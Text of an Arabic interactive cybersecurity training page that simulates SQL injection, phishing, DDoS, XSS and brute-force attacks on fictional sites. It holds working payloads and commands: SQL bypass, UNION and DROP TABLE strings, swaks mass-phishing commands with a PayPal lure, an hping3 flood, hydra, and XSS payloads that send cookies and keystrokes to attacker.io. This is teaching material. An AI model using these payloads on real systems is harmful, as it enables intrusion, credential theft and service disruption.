منصة تعليمية تفاعلية
تعلّم الأمن السيبراني
بأسلوب عملي وتفاعلي
اكتشف عالم الأمن السيبراني من خلال محاكاة حقيقية لأشهر أنواع الهجمات الإلكترونية. تعلّم كيف يفكر المهاجم وكيف يحمي المدافع الأنظمة والشبكات.
السيناريوهات المتاحة
حقن SQL
تعلّم استغلال قواعد البيانات وكيفية الحماية منه بأمثلة عملية حقيقية
التصيد الاحتيالي
اكتشف أساليب خداع المستخدمين وسرقة بياناتهم عبر رسائل البريد الإلكتروني
هجمات DDoS
شاهد كيف تؤثر هجمات الحجب على الخوادم وتعلّم استراتيجيات التخفيف
Brute Force
تخمين كلمات المرور بقوائم جاهزة — شاهد سرعة كسر كلمات المرور الضعيفة
هجمات XSS
تعلّم حقن السكريبت في المتصفح وسرقة الجلسات وكيفية الحماية منها
🎮 السيناريوهات التدريبية
مهام موجَّهة — اكتب الأوامر في الطرفية لإتمام كل خطوة
XP مكتسب:
0
🌱
المستوى المبتدئ
تعلّم الأساسيات عبر أوامر بسيطة مثل whoami, nmap, ping. كل خطوة موجَّهة بتلميح واضح.
⚙️
المستوى المتوسط
نفّذ هجمات حقيقية باستخدام أوامر مثل scan, dump, analyze, start. المساعدة جزئية فقط.
🔥
المستوى الخبير
سلاسل أوامر متقدمة بدون توجيه — ادمج أدوات متعددة واستنتج الأوامر الصحيحة بنفسك.
💡 المطلوب الآن:
$
🗄️ حقن SQL
استغلال قواعد البيانات والحماية منه
🖥️ واجهة تسجيل الدخول المستهدفة
💡 بيانات حقيقية في قاعدة البيانات — جرّبها:
admin / password | ahmed / 123456sara / qwerty | khalid / abc123
🔎 الاستعلام المُنفَّذ على قاعدة البيانات
SQL Query:
SELECT * FROM users WHERE username='' AND password=''
mysql> قاعدة البيانات — users table:
| ID | Username | Password | Role | |
|---|---|---|---|---|
| 1 | admin | password | admin@site.com | ADMIN |
| 2 | ahmed | 123456 | ahmed@site.com | user |
| 3 | sara | qwerty | sara@site.com | user |
| 4 | khalid | abc123 | k@site.com | mod |
4 rows in set
🧪 مكتبة الحمولات — انقر لتحميل وتنفيذ
' OR '1'='1
تجاوز المصادقة الأساسي — الشرط دائماً صحيح
admin'--
تعليق باقي الاستعلام بـ --
' UNION SELECT username,password FROM users--
استخراج كل المستخدمين بـ UNION
' UNION SELECT ... WHERE username='sara'--
🎯 استخراج مستخدم محدد — اختر الاسم:
'; DROP TABLE users;--
حذف جدول بالكامل — تدميري
🎣 التصيد الاحتيالي
محاكاة الرسائل الخادعة وسرقة بيانات الاعتماد
✉️ بناء بريد التصيد
📬 إرسال حقيقي لأي بريد إلكتروني
💡 أوامر حقيقية في الطرفية:
swaks --to victim@company.com --from "PayPal <noreply@paypa1.com>" --server mail.evil-lab.local
massmail --list targets.txt --template paypal.html --threads 10
gophish | setoolkit | cat targets.txt
swaks --to victim@company.com --from "PayPal <noreply@paypa1.com>" --server mail.evil-lab.local
massmail --list targets.txt --template paypal.html --threads 10
gophish | setoolkit | cat targets.txt
📧 معاينة البريد المُزيَّف
من:security@paypa1-support.com
تاريخ:اليوم، 02:47 ص
عزيزي العميل،
اكتشفنا نشاطاً مشبوهاً. يرجى التحقق خلال 24 ساعة.
🔗 https://paypa1-verify-secure.ru/login
اكتشفنا نشاطاً مشبوهاً. يرجى التحقق خلال 24 ساعة.
🔗 https://paypa1-verify-secure.ru/login
[!] Phishing Campaign Lab — Educational Simulation Only
[*] Lab initialized | Target domain: company-target.sa
[*] SMTP relay: mail.evil-lab.local | Spoofed domain: paypa1-support.com
[*] Campaign state: NOT STARTED
[*] Type 'help' to see available commands and workflow
[*] Start with: scan target
root@kali:~/phish-lab$
⚡ هجمات DDoS
شاهد تأثير الهجوم على موقع حقيقي في الوقت الفعلي
🎛️ لوحة تحكم الهجوم
نوع الهجوم
شبكة البوتنت
1,000 جهاز
معدل الإرسال
50%
الأمر المُنفَّذ:
hping3 --syn --flood -p 80 target-shop.sa
0
Req/s
0.0
Gbps
0
Bots Active
🌐 موقع الضحية — target-shop.sa
🟢 Online — 42ms
42ms
🛍️ TargetShop
الرئيسية
المنتجات
العروض
تواصل معنا
🛒 3 | 👤 تسجيل الدخول
🔥 تخفيضات الصيف
الأجهزة الإلكترونية بأقل الأسعار
شحن مجاني على الطلبات فوق 200 ريال
المنتجات الأكثر مبيعاً
📱
iPhone 15 Pro
128GB | أسود
3,299 ر
💻
MacBook Pro M3
16GB RAM | 512GB
8,499 ر
🎮
PlayStation 5
825GB SSD | مع ذراع
2,149 ر
© 2024 TargetShop.sa
SSL Secured | PCI DSS Compliant
Server: nginx/1.24.0
📊 حركة المرور — مباشر
■ هجوم DDoS
■ حركة طبيعية
📋 Server Access Log
192.168.1.1 - "GET / HTTP/1.1" 200 4821
192.168.1.2 - "GET /products HTTP/1.1" 200 9103
💉 هجمات XSS
حقن السكريبت في المتصفح وسرقة الجلسات
🌐 الموقع المستهدف
http://vulnerable-shop.sa/search?q=
🛒 متجر الإلكترونيات
الرئيسية | المنتجات | 🛒 السلة
ابحث عن منتج
server response → page innerHTML:
أدخل نصاً أو payload للبحث...
🧪 مكتبة الـ Payloads — انقر لتحميل وتنفيذ
<script>alert('hello')</script>
Reflected XSS — اختبار أساسي. اكتب أي نص داخل alert()
<img src=x onerror="alert('img-xss')">
Image onerror — يتجاوز فلاتر script tag
<script>fetch('https://attacker.io?c='+document.cookie)</script>
Cookie Theft — يُرسل الـ cookie لخادم المهاجم بشكل صامت دون إعادة توجيه
<svg onload="document.body.innerHTML='<div style=background:#000...>This site has been hacked.</div>'">
Defacement — يستبدل محتوى الصفحة كاملاً بصفحة مخترق واقعية
<script>(function(){document.addEventListener('keydown',e=>{new Image().src='https://attacker.io/k?d='+encodeURIComponent(b+=e.key)})})()</script>
Keylogger — IIFE مُخفاة تعترض كل keydown وتُرسل الإدخال عبر img beacon صامت
📡 نتيجة التنفيذ — مباشر
Alerts: 0
Cookies stolen:
Payload type detected:
— لا يوجد payload بعد
Impact:
أدخل payload لرؤية تأثيره
🔓 هجمات Brute Force
تخمين كلمات المرور بالقوة العمياء — جربة مفصّلة
🔓
كيف يعمل Brute Force؟
المهاجم يجرّب آلاف كلمات المرور بسرعة عالية باستخدام قائمة (wordlist) حتى ينجح في الدخول. كلمات المرور الضعيفة تُكسَر في ثوانٍ.
🎯 الموقع المستهدف — admin-portal.sa
https://admin-portal.sa/login
⚔️ لوحة المهاجم — Hydra-style
جاهز
① اختر القائمة (Wordlist):
🏆 الأكثر شيوعاً
password, 123456, qwerty...
💀 RockYou
iloveyou, shadow, dragon...
🇸🇦 عربية شائعة
ahmad123, riyadh, ksa1234...
🔢 أرقام (PIN)
0000, 1234, 9999...
② اختر كلمة مرور الموقع من القائمة — (المهاجم لا يعرفها!):
المختارة: password
③ سرعة الهجوم:
hydra -l admin -P top10.txt admin-portal.sa http-post-form
📡 سجل المحاولات الحية
المحاولات: 0
الفاشلة: 0
الوقت: 0s
[*] في انتظار بدء الهجوم...
[*] اختر wordlist وانقر "بدء الهجوم"
[*] اختر wordlist وانقر "بدء الهجوم"
⚡ لماذا ينجح؟
• 80% من المستخدمين يستعملون كلمات مرور ضعيفة
• لا يوجد حد لعدد المحاولات
• لا CAPTCHA ولا MFA
• لا يوجد حد لعدد المحاولات
• لا CAPTCHA ولا MFA
📊 إحصائيات حقيقية
• "password" — أشهر كلمة مرور في العالم
• PIN 4 أرقام يُكسَر في 3 ثوانٍ
• 8 أحرف صغيرة تُكسَر في ساعات
• PIN 4 أرقام يُكسَر في 3 ثوانٍ
• 8 أحرف صغيرة تُكسَر في ساعات
🛠️ أدوات Brute Force
hydra — هجوم متعدد البروتوكولات
hashcat — كسر hashes
john — John the Ripper
hashcat — كسر hashes
john — John the Ripper